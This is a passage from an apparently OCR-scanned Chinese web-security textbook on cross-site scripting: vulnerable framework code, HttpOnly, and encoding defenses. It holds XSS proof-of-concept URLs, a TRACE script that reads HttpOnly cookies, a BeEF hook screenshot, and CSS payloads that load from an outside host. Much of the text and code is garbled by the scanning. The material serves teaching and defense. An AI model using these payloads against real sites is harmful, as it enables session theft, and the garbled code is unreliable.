。never， 绝 对 禁 上 Flash 与 页 面 通 信 。 


使 用 always 是 非常 危险 的 ， 一 般 推 荐 使 用 never。 如 果 值 为 aameDomain 
的 话 ， 请 务必 确保 Flash 文 件 不 是 用 户 传 上 来 的 。 

除了 “allowScriptAccess” 外 ,，“allowNet-working” 也 非常 关键 ， 这 个 参 
数 能 控制 Flash 与 外 部 网 络 进行 通信 。 它 有 三 个 可 选 值 : ?all， 人 允许 使 
用 所 有 的 网 络 通信 ， 也 是 默认 值 ; ?internal，Flash 不 能 与 浏览 器 通信 
如 navi-gateToURL， 但 是 可 以 调用 其 他 的 API; ?none， 茜 止 任何 的 网 
络 通信 。 

一 般 建 议 此 值 设置 为 none 或 者 internal。 设 置 为 al 可 能 融 来 安全 问题 。 
除了 用 户 的 Flash 文 件 能 够 实施 脚本 攻击 外 ， 一 些 Flash 也 可 能 会 产生 
XSS 漏 洞 。 看 如 下 Ac-tionScript 代 码 : 


这 段 代码 经 常 出 现在 广告 的 Flash 中 ， 用 于 控制 用 户 点 击 后 的 URL。 但 
是 这 段 代码 缺乏 输入 验证 ， 可 以 被 XSS 攻 击 : 


h 
È 


ttp://url/to/flash-file.swf? 
lickTAG-javascript:alert('xss') 


安全 人 研究 者 Stefano Di Paola 曾 经 写 了 一 个 叫 “SWFIntruder” 的 工具 来 检 
测 产生 在 Flash 里 的 XSSs 漏 洞 ， 通 过 这 个 工具 可 以 检测 出 很 多 注入 Flash 
变量 导致 的 XSS 问 题 。 

SWFIntruder 的 界面 

要 修补 本 例 中 的 漏洞 ， 可 以 使 用 输入 检查 的 方法 : 


on (release) { 

if ( root.clickTAG.substring(0,5)-- "http:" 

E 

_root.clickTAG.substring(0,6)== "https:" || 
.root.clickTAG.substring(0,1)-- "/") { 

getURL ( root.clickTAG, " blank"); 

} 

} 


Flash XSS 往 往 被 开发 者 所 名 视 。 注 入 Flash 变 量 的 XSS， 因 为 其 问题 出 
现在 编译 后 的 Flash 文 件 中 ， 一 般 的 扫描 工具 或 者 代码 审计 工具 都 难以 
难 查 ， 常 常 使 其 成 为 漏网 之 鱼 。 

OWASP 为 Flash 安 全 研究 设立 了 一 个 Wiki 页 面 ， 有 兴趣 的 读者 可 以 人 参 


o 


3.2.9” 真 的 高 枕 无 忧 吗 : JavaScript 

开发 框 染 

在 Web 前 端 开 发 中 ， 一 些 JavaScript 开 发 框架 深 受 开发 者 欢迎 。 利 用 
和 可 以 快速 而 简洁 地 完成 前 端 开 
一 般 来 说 ， 成 熟 的 JavaScript 开 发 框架 部 会 注意 目 身 的 安全 问题 。 但 是 
代码 是 人 写 的 ， 高 手 偶尔 也 会 犯错 。 一 些 JavaScript 开 发 框架 也 曾 骏 露 
过 一 些 XSS 漏 洞 。 

Dojo 

Dojo 是 一 个 流行 的 JavaScript 开 发 框架 ， 它 曾 被 发 现存 在 XSS 漏 洞 。 在 
Dojo 1.4.1 中 ， 存 在 两 个 “DOM Based XSS”: 


File: dojo-release-1.4.1-src\dojo- 
release-1.4.1-src\dijit\tests\ testCommon.js 


用 户 输 入 由 theme 参 数 传 入 ， 然 后 被 赋值 给 变量 themeCss ， 最 终 被 
document.write 到 页 面 里 : 


Line 25: 

var str = 
window.location.href.substr(window.location.h 
ref.indexof("?")+1).split(/#/); 

Line 54 


var themeCss = 

d.moduleur1("dijit.themes", theme+"/"+theme 
+" ess"): 

var themeCssRtl = 
d.moduleur1("dijit.themes", theme+"/"+theme 
T reL.css") 

document .write('<link rel="stylesheet" 
type="text/css" href="'+themeCss+'">'); 
document .write('<link rel="stylesheet" 
type="text/css" href="'+themeCssRtl+'">'); 


所 以 凡是 引用 了 _testCommon.js 的 文件 ， 都 受 影响 。POC 如 下 : 


http://WebApp/dijit/tests/form/ 
test Button.html?themez"/»«script»alert(/ 
xss/)«/script» 


类 似 的 问题 还 存在 于 : 


File: dojo-release-1.4.1-src\dojo- 
release-1.4.1-src\util\doh\runner.html 


它 也 是 从 window.location 传 入 了 用 户 能 够 控制 的 数据 ， 最 终 被 
document.write 到 页 面 : 


Line 40: 
var qstr - window.location.search.substr(1); 


document .write("<scr"+"ipt type='text/ 
javascript' djConfig='isDebug: true' 
src='"+dojoUr1+"'></scr"+"ipt>"); 
..Snip.. 

document .write("<scr"+"ipt type='text/ 
javascript' src='"+testUrl+".js'></ 
scr"+"ipt>"); 


POC 如 下 : 


http://WebApp/util/doh/runner.html?dojoUrl-'/ 
>foo< ipt><' 


scrip 
"<script>alert(/xss/)</script> 


这 些 问题 在 Dojo 1.4.2 版 本 中 已 经 得 到 修补 。 但 是 从 这 些 漏洞 可 以 看 
到 ， 使 用 JavaScript 开 发 框架 也 并 非 高 枕 无 居 ， 需 要 随时 关注 可 能 出 现 
的 安全 问题 。 

YUI 

翻 翻 YUI 的 bugtracker， 也 可 以 看 到 类 似 Dojo 的 问题 。 

在 YUI 2.8.1 中 曾经 fix 过 一 个 “DOM BasedXSS”。YUI 的 History Manager 
功能 中 有 这 样 一 个 问题 ， 打 开 官 方 的 demo 页 : 


http://developer.yahoo.com/yui/examples/ 
istor i b rce.html 


history/history-navbar sou 


点 击 一 个 Tab 页 ， 等 待 页 面 加 载 完 成 后 ， 在 URL 的 hash 中 插入 恶意 脚 
本 。 构 造 的 XSS 如 下 : 


http://developer.yahoo.com/yui/examples/ 
history/history-navbar source.htmlénavbar-hom 
e<script>alert(1)</script> 


脚本 将 得 到 执行 。 其 原因 是 在 history.js 的 _updateIframe 方 法 中 信任 了 用 
户 可 控制 的 变量 : 


html = '«html»«body»«div id="state">' + 
fqstate + '</div></body></html>; 


最 后 被 写 入 到 页 面 导 致 脚本 执行 。YUI 的 修补 方案 是 对 变量 进行 了 
htmlEscape ? 

jQuery 

jQuery 可 能 是 目前 最 流行 的 JavaScript 框 架 。 它 本 喘 出 现 的 XSS 漏 洞 很 
少 。 但 是 开发 者 应 该 记 住 的 是 ，JavaScript 框 架 只 是 对 JavaScript 语 言 本 
号 的 封 玫 ， 并 不 能 解决 代码 逻 得 上 产生 的 问题 。 所 以 开发 者 的 意识 才 
是 安全 编码 的 关键 所 在 。 

在 jQuery 中 有 一 个 html0 方 法 。 这 个 方法 如 采 没 有 参数 ， 束 是 读 取 一 个 
DOM T ziüyJinner-HTML; 如 果 有 参数 ， 则 会 把 参数 值 写 入 该 DOM 广 
点 的 innerHTML 中 。 这 个 过 程 中 有 可 能 产生 “DOM Based XSS”: 


$('div.demo-container').html("«img src=# 
onerror=alert(1) /»"); 


如 上 ， 如 采用 户 能 够 控制 输入 ， 则 必然 会 产生 XSS。 在 开发 过 程 中 需 
要 注意 这 些 问题 。 

使 用 JavaScript 框 以 并 不 能 让 开发 者 高 枕 无 忧 ， 同 样 可 能 存在 安全 加 
题 。 除 了 需要 关注 框架 本 的 安全 外 ， 开 发 者 还 要 提高 安全 意识 ， 理 解 
并 正确 地 使 用 开发 框 染 。 


33 XSS 的 防御 

XSS 的 防御 是 复杂 的 。 

流行 的 浏览 器 都 内 置 了 一 些 对 抗 XSS 的 措施 ， 比 如 Firefox 的 CSP、 
Noscript 2, IE 8 内 置 的 XSS Filter 等 。 而 对 于 网 站 来 说 ， 也 应 该 寻找 
优秀 的 解决 方案 ， 保 护 用 户 不 被 XSS 攻 击 。 在 本 书 中 ， 主 要 把 精力 放 在 
如 何 为 网 站 设计 安全 的 XSS 解 决 方案 上 。 

3.3.1 ”四两拨千斤 : HttpOnly 

HttpOnly 最 早 是 由 微软 提出 ， 并 在 IE 6 中 实现 的 ， 至 今 已 经 逐渐 成 为 一 
个 标准 。 浏 览 器 将 禁止 页 面 的 JavaScript 访 问 带 有 HttpOnly 属 性 的 
Cookie ° 

以 下 浏 蜗 吏 开始 文 持 HttpOnly: 


Microsoft IE 6 SP1+ 
Mozilla Firefox 2.0.0.5+ 
Mozilla Firefox 3.0.0.6 
Google Chrome 

Apple Safari 4.0+ 
Opera 9.5+ 


严格 地 说 ，HttpOnly 并 非 为 了 对 抗 XSS 一 一 HttpOnly 解 决 的 是 XSS 后 的 
Cookie hj WE © 

在 “初探 XSS Payload" — B F, Bana E FH XSS 3 UH P B5 
Cookie, ， 然 后 登录 进 该 用 户 的 账户 >。 但 如 果 该 Cookie 设 置 了 
HttpOnly， 则 这 种 攻击 会 失败 ， 因 为 JavaScript 读 取 不 到 Cookie 的 值 。 

一 个 Cookie 的 使 用 过 程 如 下 。 

Stepl: 浏览 器 同 服 务 絮 发 起 请 求 ， 这 时 候 没 有 Cookie ° 

Step2: 服务 器 返回 时 发 送 Set-Cookie 涉 ， 问 客户 六 浏 贤 絮 写 入 Cookie ° 
Step3: 在 该 Cookie 到 期 前 ， 浏 贤 絮 访问 该 域 下 的 所 有 页 面 ， 都 将 发 送 
该 Cookie ° 

HttpOnly 是 在 Set-Cookie 时 标记 的 : 


Set-Cookie: <name>=<value>[; <Max-Age>=<age>] 
[; expires=<date>][; domain=<d i 
[; path=<s 


n=<domain_name 
ome_path>][; secure][; HttpOnly] 


需要 注意 的 是 ， 服 务 器 可 能 会 设置 多 个 Cookie (多 个 key-value 对 ) , TU 
HttpOnly 可 以 有 选择 性 地 加 在 任何 一 个 Cookie 值 上 。 

在 某 些 时 候 ， 应 用 可 能 需要 JavaScript 访 问 某 几 项 Cookie， 这 种 Cookie 
可 以 不 设置 HttpOnly 标 记 ; 而 仅 把 HttpOnly 标 记 给 用 于 认证 的 天 键 
Cookie ° 


HttpOnly 的 使 用 非常 灵活 。 如 下 是 一 个 使 用 HttpOnly 的 过 程 。 


<?ph 

header("Set-Cookie: cookiei-test1;"); 
header("Set-Cookie: cookie2-test2;httponly", 
false); 

7> 


<script> 
alert(document.cookie); 
«/script» 


在 这 段 代 码 中 ，cookie1 没 有 HttpOnly，cookie2 被 标记 为 HttpOnly。 两 
^ Cookie33 $8 E AG it an: 


mm e uem, tm tv - 


rj 
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测试 页 面 的 HTTP 响应 头 


T 
T 


DI oss Ug Sgen T Wi T Cookie: 


ey d mmm css Bk DOK AH Events | Cookiesv 


Cookies diese" | A CERE cookie) * | TR 


098 | -——À | 大 小 EET: ETT Bt 
¥ cookie2 test2 wawa com 128 | Sif HttpOnly 
* cookiel test! www a.com 128 | gi 


ii od as e ACRI PATI Cookie 
但 是 只 有 cookiel 被 JavaScript 读 取 到 |: 


cookiel 被 JavaScript 读 取 

HttpOnly 起 到 了 应 有 的 作用 。 

在 不 同 的 语言 中 ， 给 Cookie 添 加 HttpOnly 的 代码 如 下 : 
Java EE 


response.setHeader("Set-Cookie" 
"cookiename-value; 
Path-/;Domain-domainvalue;Max-Ag 
e-seconds;HTTPOnly"); 


C# 


HttpCookie myCookie - new 
HttpCookie("myCookie"); 
myCookie.HttpOnly - true; 
Response.AppendCookie(myCookie); 


VB.NET 


Dim myCookie As HttpCookie - new 
HttpCookie("myCookie") 
myCookie.HttpOnly - True 
Response.AppendCookie(myCookie) 


但 是 在 .NET 1.1 中 需要 手动 添加 : 


$ telnet foo.com 80 

Trying 127.0.0.1... 

Connected to foo.bar. 

Escape character is '^]'. 

TRACE / HTTP/1.1 

Host: foo.bar 

X-Header: test 

HTTP/1.1 200 OK 

Date: Mon, 02 Dec 2002 19:24:51 GMT 
Server: Apache/2.0.40 (Unix) 
Content-Type: message/http 

TRACE / HTTP/1.1 

Host: foo.bar 

X-Header: test 
Response.Cookies[cookie].Path += ";HTTPOnly"; 


PHP 4 


header("Set-Cookie: hidden=value; httpOnly"); 


PHP 5 


setcookie("abc", "test", NULL, NULL, NULL 
NULL, TRUE); 


最 后 一 个 参数 为 HttpOnly 属 性 。 

添加 HttpOnly 的 过 程 简 单 ， 效 果 明 显 ， 有 如 四 两 拨 千 斤 。 但 是 在 部 署 时 
需要 注意 ， 如 果 业 务 非常 复杂 ， 则 需要 在 所 有 Set-Cookie 的 地 方 ， 给 天 
键 Cookie 都 加 上 HttpOnly。 源 挥 了 一 个 地 方 ， 痢 可 能 使 得 这 个 方案 失 
x o 

在 过 去 几 年 中 ， 曾 经 出 现 过 一 些 能 够 绕 过 HttpOnly 的 攻击 方法 。 

Apache 支 持 的 一 个 Header 是 TRACE。TRACE 一 般 用 于 调试 ， 它 会 将 请 
求 头 作为 HTTPResponse Body 返 回 。 


$ telnet foo.com 80 

Trying 127.0.0.1... 

Connected to foo.bar. 

Escape character is '^]'. 

TRACE / HTTP/1.1 

Host: foo.bar 

X-Header: test 

HTTP/1.1 200 OK 

Date: Mon, 02 Dec 2002 19:24:51 GMT 


Server: Apache/2.0.40 (Unix) 
Content-Type: message/http 
TRACE / HTTP/1.1 

Host: foo.bar 

X-Header: test 


利用 这 个 特性 ， 可 以 把 HttpOnly Cookie 读 出 来 。 


«script type="text/javascript"> 
«l-- 


function sendTrace () { 
var xmlHttp = new 
ActiveXObject("Microsoft.XMLHTTP"); 
xmlHttp.open("TRACE" 
"http://foo.bar", false); 
xmlHttp.send(); 
xmlDoc-xmlHttp.responseText; 


alert(xmlDoc); 
//--> 
</script> 
<INPUT TYPE=BUTTON OnClick="sendTrace();" 
ALUE-"Send Trace Request"> 
4E WP: 
=] . 


Microsoft Internet Explorer 


m 

Accept-Language: rs1_319beeb5231;q=0.0,rs2_848a99748r2;q=0.0,1s3_5024d4c505;q=0.0 
Referer, SS 

Accept-Encoding: gzip, deflate 

User-Agent: 4.0 (compatible: MSIE 6.0; Windows NT 5.0) 

Host; dim ae t 

Content-Length: 0 
Connection: Keep-Alive 


IL TIS 


pokia; 5WID=00E57608.89F4.4CE6.6D42.6007E44C4291 ; DETECT21,0,06.142645821946569840428 


JavaScriptisz ĝl] cookie 

目前 各 广 商都 已 经 修补 了 这 些 漏洞 ， 但 是 未 来 也 许 还 会 有 新 的 漏洞 出 
现 。 现 在 业界 给 关键 业务 添加 HttpOnly Cookie 已 经 成 为 一 种 “标准 ”的 做 
法 。 

但 是 ，HttpOnly 不 是 万 能 的 ， 添 加 了 HttpOnly 丰 等 于 解决 了 XSS 问 题 。 
XSS 攻 击 带 来 的 不 光 是 Cookie 动 持 问 题 ， 还 有 镭 取 用 户 信 息 、 模 拟 用 户 
身份 执行 操作 等 诸多 严重 的 后 果 。 如 前 文 所 述 ， 攻 击 者 利用 AJAX 构 造 
HTTP 请 求 ， 以 用 户 身 份 完成 的 操作 ， 束 是 在 不 知道 用 户 Cookie 的 情况 
下 进行 的 。 

HttpOnly 有 助 于 缓解 XSS 攻 击 ， 但 仍然 需要 其 他 能 够 解决 XSS 漏 洞 


o 


AN 


3.3.2 ”输入 检查 

常见 的 Web 漏洞 如 XSS、SQL Injection 等 ， 都 要 求 攻击 者 构造 一 些 特殊 
字符 ， 这 些 特殊 字符 可 能 是 正常 用 户 不 会 用 到 的 ， 所 以 输入 检查 承 有 
存在 的 必要 了 。 

输入 检查 ， 在 很 多 时 候 也 被 用 于 格式 检查 。 例 如 ， 用 户 在 网 站 注册 时 
填写 的 用 户 名 ， 会 被 要 求 只 能 为 字母 、 数 字 的 组 合 。 比 
2 MH RUE 户 名 ， 而 “hello#$ 人 ”就 是 一 个 非法 的 用 户 


又 如 注册 时 填写 的 电话 、 邮 件 、 生 日 等 信息 ， 都 有 一 定 的 格式 规范 。 
比如 手机 号 码 ， 应 该 是 不 长 于 16 位 的 数字 ， 且 中 国 大 陆地 区 的 手机 号 
码 可 能 是 13x、15x 开 头 的 ， 否 则 即 为 非法 e 

这 些 格式 检查 ， 有 点 像 一 种 “ 白 名 单 ”， 也 可 以 让 一 些 基 于 特殊 字符 的 
攻击 失效 。 

输入 检查 的 逻辑 ， 必 须 放 在 服务 器 端 代 码 中 实现 。 如 果 只 是 在 客户 端 
使 用 JavaScript 进 行 输 入 检查 ， 是 很 容易 被 攻击 者 绕 过 的 。 目 前 Web 开 
发 的 普遍 做 法 ， 是 同时 在 客户 端 JavaScript 中 和 服务 器 端 代码 中 实现 相 
同 的 输入 检查 。 客 户 痢 JavaScript 的 输入 检查 ， 可 以 阻挡 大 部 分 误 操 作 
的 正常 用 户 ， 从 而 节约 服务 器 资源 。 

在 XSS 的 防御 上 ， 输 入 检查 一 般 是 检查 用 户 输入 的 数据 中 是 否 包 含 一 
些 特 殊 字符 ， 如 <、>、?，、” 等 。 如 果 发 现存 在 特殊 字符 ， 则 将 这 些 字 
符 过 小 或 者 编码 。 

比较 智能 的 “输入 检查 *， 可 能 还 会 匹配 XSS 的 特征 。 比 如 查找 用 户 数 
据 中 是 否 包含 了 “<script>”、“javascript” 等 敏感 字符 。 

这 种 输入 检查 的 方式 ， 可 以 称 为 “XSS Filter”。 互 联网 上 有 很 多 开源 
的 “XSS Filter” 的 实现 。 

XSS Filter 在 用 户 提 交 数 据 时 获取 变量 ， 并 进行 XSS 检 查 ; 但 此 时 用 户 
数据 并 没有 结合 泻 染 页 面 的 HTML 代 码 ， 因 此 XSS Filter 对 语 境 的 理解 
并 不 完整 。 

比如 下 面 这 个 XSS 漏 洞 : 


cript S ar" »«/script» 


其 中 “$var* 是 用 户 可 以 控制 的 变量 。 用 户 只 需要 提交 一 个 恶意 脚本 所 
在 的 URL 地 址 ， 即 可 实施 XSS 攻 击 。 

如 果 是 一 个 全 局 性 的 XSS Filter， 则 无 法 看 到 用 户 数 据 的 输出 语 境 ， 而 
只 能 看 到 用 户 提交 了 一 个 URL， 束 很 可 能 会 漏 报 。 因 为 在 大 多 数 情 况 


下 ，UREL 是 一 种 合法 的 用 户 数据 。 

XSS Filter 还 有 一 个 问题 一 一 其 对 “<”、“>” 等 字符 的 处 理 ， 可 能 会 改变 
用 户 数 据 的 语义 。 

比如 ， 用 户 输入 : 

对 于 XSS Filter 来 说 ， 发 现 了 敏感 字符 “<”。 如 果 XSS Filter/^ 97 * 7 
能 "， 粗 暴 地 过 滤 或 者 蔡 换 了 “<”， 则 可 能 会 改变 用 户 原 本 的 意思 。 
输入 数据 ， 还 可 能 会 被 展示 在 多 个 地 方 ， 每 个 地 方 的 语 境 可 能 各 不 相 
同 ， 如 果 使 用 单一 的 替换 操作 ， 则 可 能 会 出 现 问题 。 

比如 用 户 的 “昵称 ”会 在 很 多 页 面 进行 展示 ， 但 是 每 个 页 面 的 场景 可 能 
都 是 不 同 的 ， 展 示 时 的 需求 也 不 相同 。 如 果 在 输入 的 地 方 统一 对 数据 
做 了 改变 ， 那 么 输出 展示 时 ， 可 能 会 遇 到 如 下 问题 。 

用 户 输入 的 昵称 如 下 : 


name = ' 我 是 "天 才 "' 


如 果 在 XSS Filter 中 对 双 引 号 进行 转 义 : 


$nickname = ' 我 是 \" 天 才 \"' 


在 HTML 代 码 中 展示 时 : 


<div> 我 是 \" 天 才 \"<div> 


在 JavaScript 代 码 中 展示 时 : 


ript> 
var nick = ' 我 是 \" 天 才 \"'， 
ocument.write(nick); 
«/script» 


这 两 段 代码 ， 分 别 得 到 如 下 结果 : 


aec m o toner © enue Domen 


第 一 个 结果 显然 不 是 用 户 想 看 到 的 。 


3.3.3 ”输出 检查 

愤然 “输入 检查 ”存在 这 么 多 问题 ， 那 么 “输出 检查 ”又 如 何 呢 ? 

一 般 来 说 ， 除 了 富 文本 的 输出 外 ， 在 变量 输出 到 HTML 页 面 时 ， 可 以 使 
用 编码 或 转 义 的 方式 来 防御 XSS 攻 击 。 

3.3.3.1 ”安全 的 编码 丽 数 

编码 分 为 很 多 种 ， 针 对 HTML 代 码 的 编码 方式 是 HtmlEncode。 
HtmlEncode 并 非 专 用 名 词 ， 它 只 是 一 种 函数 实现 。 它 的 作用 是 将 字符 
转换 成 HIMLEntities， 对 应 的 标准 是 ISO-8859-1。 

为 了 对 抗 XSS， 在 HtmlEncode 中 要 求 至 少 转换 以 下 字符 : 

中 ， 有 htmlentities0 和 htmlspe-cialcharsO) 两 个 函数 可 以 满足 安全 
相应 地 ，JavaScript 的 编码 方式 可 以 使 用 JavascriptEncode ° 
JavascriptEncode 与 HtmlEncode 的 编码 方法 不 同 ， 它 需要 使 用 ^\” 对 特殊 
字符 进行 转 义 。 在 对 抗 XSS 时 ， 还 要 求 输出 的 变量 必须 在 引号 内 部 ， 以 
避免 造成 安全 问题 。 比 较 下 面 两 种 写法 : 


= escapeJavas t($evil); 
'"'+escapeJ 


crip $ 
y= peJavascript($evil)+'"'; 


A RescapeJavascriptO HIM AR MT Leber, PEM > + <> >> 
\、&&、# 等 ， 那 么 上 面 的 两 行 代码 输出 后 可 能 会 变 成 : 


var x = 1;alert(2); 
var y = "1;alert(2)"; 


第 一 行 执行 额外 的 代码 了 ; 第 二 行 则 是 安全 的 。 对 于 后 者 ， 攻 击 者 即 
使 想 要 逃逸 出 引号 的 范围 ， 也 会 遇 到 困难 : 

所 以 要 求 使 用 JavascriptEncode 的 变量 输出 一 定 要 在 引号 内 。 

可 是 很 多 开发 者 没有 这 个 习惯 怎么 办 ? 这 就 只 能 使 用 一 个 更 加 严格 的 
JavascriptEncode EX 23 2 PRUE EZ 4 除了 数字 、 字 母 外 的 所 有 字符 ， 
都 使 用 十 六 进 制 AxHH” 的 方式 进行 编码 。 在 本 例 中 : 


r x = 1;alert(2); 


SELF: 


r x = 1\x3balert\x282\x29; 


如 此 代码 可 以 保证 是 安全 的 。 


在 OWASP ESAPI 中 有 一 个 安全 的 JavascriptEncode 的 实现 ， 非 常 严格 。 


yt 
* {@inheritDoc} 
* 


* Returns backslash encoded numeric 
format. Does not use backslash character 
escapes 

* such as, \" or \' as these may 
cause parsing problems. For example, if a javascript 

* attribute, such as onmouseover 
contains a \" that will close the entire 
attribute and 

* allow an attacker to inject 
another script attribute. 

* 


* @param immune 
tf 
public String 
encodeCharacter( char[] immune, Character 
c)t 
// check for immune 
characters 
if ( containsCharacter(c, 
immune ) ) { 
return ""+c; 


// check for alphanumeric 
characters 
String hex - 
Codec.getHexForNonAlphanumeric(c); 
if ( hex == null ) ( 
return ""+c; 


// Do not use these 
shortcuts as they can be used to break out 
of a context 

// if ( ch == 0x00 ) return 


"NN"; 

// if ( ch == 0x08 ) return 
"NND"; 

// if ( ch -- 0x09 ) return 
"NEU; 

// if ( ch == 0x0a ) return 
"SNR"; 

// if ( ch == 0x0b ) return 
"wv"; 

// if ( ch == 0x0c ) return 
"NUS 

// if ( ch == 0x0d ) return 
"r"; 

// if ( ch == 0x22 ) return 
myn; 

// if ( ch == 0x27 ) return 
myr; 

// if ( ch == 0x5c ) return 
SS 

// encode up to 256 with \ 
NXHH 


o 


tring temp - Integer.toHexString(c); 
if(c«256)( 

String pad - 
"QO".substring(temp.length() ); 

return "\\x" + pad + 

temp. toUpperCase(); 


// otherwise encode with \ 
\UHHHH 

String pad = 
"0000".substring(temp.length() ); 
return "\\u" + pad + 
temp. toUpperCase(); 


除了 HtmlEncode、JavascriptEncode 外 ， 还 有 许多 用 于 各 种 情况 的 编码 
函数 ， 比 如 XMLEn-code (其 实现 与 HtmlEncode 类 似 ) 、JSONEn-code 
(与 JavascriptEncode 类 似 ) 等 。 


在 “Apache Common Lang” 的 “StringEscapeUtils” 里 ， 提 供 了 许多 escape 
的 函数 。 


import 
org.apache.commons.lang.StringEscapeUtils; 
public class StringUtilsEscapeExamplev1 { 
l(unescapedXML)); 

String unescapedHTML = "<data>"; 
System.err.println(StringEscapeUtils.escapeHt 
ml(unescapedHTML)); 


} 
} 


可 以 在 适当 的 情况 下 选用 适当 的 函数 。 需 要 注意 的 是 ， 编 码 后 的 数据 
长 度 可 能 会 发 生 改 变 ， 从 而 影响 某 些 功能 。 在 写 代码 时 需要 注意 这 个 
WT, Der ET ER bug ° 

3.3.3.2 ”只 需 一 种 编码 吗 

XSS 攻 击 主要 发 生 在 MVC 架 构 中 的 View 层 。 大 部 分 的 XSS 漏 洞 可 以 在 
模板 系统 中 解决 。 

TE Python) FF Z HER Django H iv BJ Ef A i“ Django Templates” 中 ， 可 
以 使 用 escape 进 行 HtmlEncode。 比 如 : 

这 样 写 的 变量 ， 会 被 HtmlEncode 编 码 。 

这 一 特性 在 Django 1.0 中 得 到 了 加 强 一 一 默认 所 有 的 变量 都 会 被 
escape。 这 个 做 法 是 值得 称道 的 ， 它 符合 “Secure By Default” JRI] 。 

在 Python 的 男 一 个 框架 web2py 中 ， 也 默认 escape 了 所 有 的 变量 。 在 
web2py 的 安全 文档 中 ， 有 这 样 一 句 话 : 

web2py, by default, escapes all variables ren-dered in the view, thus 
preventing XSS. 

Django 和 web2py 都 选择 在 View 层 默认 HtmlEncode 所 有 变量 以 对 抗 
XSS， 出 发 点 很 好 。 但 是 ， 像 web2py 这 样 认为 这 就 解决 了 XSS 问 题 ， 是 
错误 的 观点 。 

前 文 提 到 ，XSS 是 很 复杂 的 问题 ， 需 要 “在 正确 的 地 方 使 用 正确 的 编码 
方式 ”。 看 看 下 面 这 个 例子 : 


« > 
<a href=# onclick="alert('$var');" >test</a> 
> 


开发 者 希望 看 到 的 效果 是 ， 用 户 点 击 链接 后 ， 弹 出 变量 “$var” 的 内 容 。 
可 是 用 户 如 采 输 入 : 


$var = htmlencode("');alert('2"); 


对 变量 “$var”j 进 行 HtmlEncode 后 ， 深 染 的 结果 是 : 


onclick="alert('&#x27; &#x29; &#x3b;alert&#x28; 
&#X27;2');" >test</a> 
</body> 


WP bE as KUL, htmlparserZ (te 1 JavaScript Parser 执 行 ， 所 以 解析 
We, &HtmlEncodet FIRE, MAST JavaScript E ° 
此 ， 经 过 htmlparser 解 析 后 相当 于 : 


body> 
«a href=# onclick-"alert('');alert('2');" 


>test</a> 
</body> 


成 功 在 onclick 事 件 中 注入 了 XSS 代 码 ! 


第 一 次 弹 框 : 


View Zombies Standard Modules Browser Modules Network Modules Options Help 


Browser Exploitation 
Framework 


BeEF 


Autorun 
Disabled 

Zombies 
€& 10006 
@8 10005 
ef 10.0.0.10 
€A 1000.10 
€ s 1000.10 


8 10.0.0.10 
Details 


Browser 
| Chrome 3.0.195.21 
Operating System 
| Windows NT 5.1 
Screen 
1440x754 with 32-bit colour 
URL 
http://10.0,0.6/beef /hook/example.php 
| Cookie 
BeEFSession«a042a1c1741d38ee3c701f1c026d2245 


Page Content 
Content 


«img srce".. /Images/beef.gif" alte "BeEF"» BeEF Test Page«br» «br» 


«script language "Javascript" 
srcz^http://10.0.0.6/beef /hook /beefmagic.js.php"» « /script» 


The following code needs to be included in the zombie: «br» 
«code» 

| Mt;script language Javascript" 
src" http://10.0.0.6/beef/hook/beefmagic.js.php'&gt;&lt; /script&gt; 
«[code» 
<br> 


Key Logger 
Keys 


3158 — T alert 


第 二 次 弹 框 : 


105 


Default Pugin 

Java Embedding Plugin 0.0.7.1 
QuickTime l'ug- in 764 
Shockwave Flash 

FipsMac Windows Maia Plugin 222 
(PhataPhotacast 

Module code sent 

Module Result: 

Adobe Reader 9.0 

Windows Paball 

Windows Movie Maker 

MSN 


Paros 


Module code sent 
Zombie connected: Firefox 3.0.14 - Unux 486 


Zombie connected Safari $31.9 ~ intel Mac OS X 
1051 


Zombie connected: Firefox 3.5.3 ~ Intel Mac OS X 105 


Zombie connected: Internet Explorer 1.0 - Windows NT 
53 


Zombie connected Firefox 3.0.10 - Windows NT $1 


— connected Chrome 30.195,21 - Windows NT 
4 


a XSS Sitel Server 
Victim Browser 


XSS against site 


Script commands run here 


IFRAMEI 
Sitel documents 
loaded into here 


"Channel "set to 
other site with info in 


Attacker System 


XSS Sitel Server 


执行 第 二 个 alert 

导致 XSS 攻 击发 生 的 原因 ， 是 由 于 没有 分 清楚 输出 变量 的 语 境 ! 因此 并 
了 auto-escape 就 万 事 大 吉 了 ，XSS 的 防御 需要 区 分 
情况 对 待 。 


3.3.4 ”正确 地 防御 XSS 

为 了 更 好 地 设计 XSS 防 御 方 案 ， 需 要 认 清 XSS 产 生 的 本 质 原 因 。 

XSS 的 本 质 还 是 一 种 “HTML 注 入 ”， 用 户 的 数据 被 当成 了 HTML 代 码 一 
部 分 来 执行 ， 从 而 混淆 了 原本 的 语义 ， 产 生 了 新 的 语义 。 

如 果 网 站 使 用 了 了 MVC 架构， 那么 XSS 就 发 生 在 View 层 一 一 在 应 用 拼接 
变量 到 HTML 页 面 时 产生 。 所 以 在 用 户 提 交 数 据 处 进行 输入 检查 的 方 
案 ， 其 实 并 不 是 在 真正 发 生 攻 击 的 地 方 做 防御 。 
i 
1: o 


下 面 将 用 变量 “$var” 表 示 用 户 数 据 ， 它 将 被 填充 入 HTML 代 码 中 。 可 能 
存在 以 下 场景 。 在 HTML 标 签 中 输出 


<div>$var</div> 
<a href=# >$var</a> 


所 有 在 标签 中 输出 的 变量 ， 如 有 果 未 做 任何 处 理 ， 都 能 导致 直接 产生 
XSS ° 

EAHA B, XSSR HAREE — 1 «scripp tE, 或 者 是 
任何 能 够 产生 脚本 执行 的 方式 。 比 如 : 


<div><script>alert(/xss/)</script></div> 


或 者 


a href=# »«img Src=# onerror-alert(1) /></ 


防御 方法 是 对 变量 使 用 HtmlEncode。 在 HTML 属 性 中 输出 
在 <scrip 忆 标签 中 输出 时 ， 首 先 应 该 确保 输出 的 变量 在 引号 中 : 


«scri pt» 
" 


攻击 者 需要 先 闭 合 引 号 才能 实施 XSS 攻 击 : 


var x = "";alert(/xss/);//"; 
«/script» 


防御 时 使 用 JavascriptEncode ° 

在 事件 中 输出 

在 事件 中 输出 和 在 <script> 标 签 中 输出 类 似 : 
可 能 的 攻击 方法 : 


<a href=# onclick="funcA('');alert(/ 
xss/);//')" >test</a> 


在 防御 时 需要 使 用 JavascriptEncode。 在 CSS 中 输出 


在 CSS 和 style、style attribute 中 形成 XSS 的 方式 非常 多 样 化 ， 参 考 下 面 
几 个 XSS 的 例子 。 


<STYLE> iuda s ee //ha.ckers.org/ 
xss.css! 

<STYLE> Tn d moz- 
binding:url("http://ha. duas org/ 
xssmoz.xml#xss")}</STY 

«XSS STYLE="behavior: TER hite Pia 
